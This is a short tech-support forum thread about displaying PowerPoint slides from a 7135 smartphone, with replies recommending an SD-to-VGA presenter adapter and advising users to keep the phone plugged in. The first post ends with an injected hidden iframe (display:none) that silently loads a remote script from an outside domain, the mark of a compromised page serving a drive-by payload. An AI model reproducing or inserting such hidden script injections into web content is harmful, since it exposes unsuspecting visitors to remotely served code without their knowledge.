+ Reply to Thread

Display Powerpoint Slides w/7135?

Can someone explain the capabilities of using the 7135 to display Powerpoint slides.

1. Can this be done?

2. Is there a cable that plugs straight from the phone to a projector?

3. What type of max resolution and # bits of color can it display via the output connection?

Thanks for any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

psf
    Margi Systems Presenter to Go - costs about $200.00. One end is an SD card connector that plugs into the SD slot. The other end has a VGA connector that plugs into a projector, monitor, etc. It offers XGA (1024x76 resolution in full color. It works great for me - I use it constantly. The only drawback is that the PowerPoint presentation can not contain animation or transitions - just straight slides.

Thanks for the info. One question. What if your phone looses battery life during a presentation. Can plugging it into an outlet bring the presentation back up instantly or would it take some time to get enough charge.

I would recommend plugging it in for the slide show. Because if the battery dies during the show, the thing will soft reset and it will be a bit before you are up and running again, let alone back to the slide where it died.

Too embarassing in front of a crowd. Just plug it in, in advance.
    ~'kito
    pdaPhoneHome Moderator

Another way to present PowerPoint slides with the 7135 is with an account at SalesTool.com. You open your menu in the browser and you can give a remote online presentation.

Frank

PowerPoint Presentations

I am dreaming about the possibility of making PowerPoint presentations without the need to carry my laptop computer around with me. I know "QuickPoint" is a component of QuickOffice Pro and it lets you store and edit PowerPoint presentations on the Palm device. What I am unclear about is how I go about connecting the 7135 to a computer projector in order to display a PowerPoint presentation. The Quick Office website talks about it (and even shows a picture of a Palm device being attached via cable to a computer projector) but doesn't include very much in the way of detailed information.

Has anyone actually accomplished this using a 7135? I'd love to be able to do this. I give a lot of PowerPoint presentations in my work and I would really look forward to the day when I could make PowerPoint presentations using only my 7135 and a computer projector and thereby become liberated from carrying around my laptop computer!
    Dave

Here you go:

Originally posted by Marty
    Here you go:

http://www.smartphonesource.com/vbul...&threadid=7275
    Thanks Marty!

I know, I know..."the search tool is my friend"...:p
    Dave

Originally posted by dwdod
    Thanks Marty!

I know, I know..."the search tool is my friend"...:p
    lol....Not a problem